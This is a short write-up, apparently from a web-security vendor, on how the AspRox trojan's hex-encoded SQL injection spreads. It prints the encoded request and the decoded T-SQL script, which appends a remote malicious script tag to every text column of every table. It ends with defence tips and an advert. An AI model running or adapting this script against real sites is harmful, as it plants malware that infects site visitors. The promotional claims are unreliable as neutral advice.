Binary Encoded SQL Injection Attack
When the AspRox
Virus/Trojan first appeared, it took the form of a phishing Trojan, but a recent update pushed to infected computers revealed an entirely new make up for this online Malbot.
The bot has been
transformed into an unusual form of attackware that is
rapidly infecting websites and users.
Once its
installed on a users machine the Trojan starts sending AScII
encoded http Get requests to vulnerable websites written
in asp, it uses a backdoor on the users machine to do
this.
These malicious requests
contain an AsCII binary encoded T-SQL script, Similar to that
shown below.
(string reduced)
;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054
20564152434........20VARCHAR(4000));EXEC(@S);--
The script attempts to connect to the websites database, where it creates a table cursor to browse through the table columns. It retrieves all info from specific
VARCHAR fields in all tables found, it then assigns its own value to the current values (in this case a
JavaScript file) and performs an update on the database.
Decoding
the injection reveals the hidden T-SQL script.
[subject to variation]
|
DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor, CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */
AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* NVARCHAR */ OR
[B].[XType] = 167 /* VARCHAR */)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS = 0)
BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] =
RTRIM(CONVERT(VARCHAR, [' + @C + '])) +
''<script src="http://aus[removed].%%%/ngg.js"></script>''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
NEXT
CLOSE Table_Cursor
DEALLOCATE Table_Cursor |
The result for those sites affected is the inclusion of the malicious
Javascript file in all fields described, this causes any data retrieved on to the websites webpage to run the file on the website users machine.
When the
JavaScript file is run, a tiny i-frame is created which then attempts to download malicious software from another host website using up-to 9 different browser exploits.
Thus the whole cycle starts again, continuing the spread of infection.
It
has been noted that this particular Trojan can be quite
difficult to protect websites against. We have heard
many reports of 'well coded' sites suffering from this
Trojan.
Write Up
By: Baz {FireStorm}
Website
Owners
It is
imperative that all querystring and form data is checked
vigorously before being executed against the database.
All session objects should also be subject to the same
checking methods.
Simply
checking 'Server Variables' is not acceptable
protection, these can be spoofed.
Restricting
database rights is important on high use front end web
applications, only allow what is absolutely essential.
What Can I Do?
We can offer you a specially designed package to protect your website against attacks by this notoriously difficult to clean Trojan. Our package can usually be installed onto your website and database very quickly offering almost instant protection. We can also repair and rebuild your corrupt database, and have you back up and running in no-time at all. Contact us now for a highly
competitive quote.
Website solutions to the AspRox Trojan start from £49.99
FireFile Website Protection
ASP Version
Download Now
Protect your website
against SQL Injection, XSS, And Malicious Code
top
|
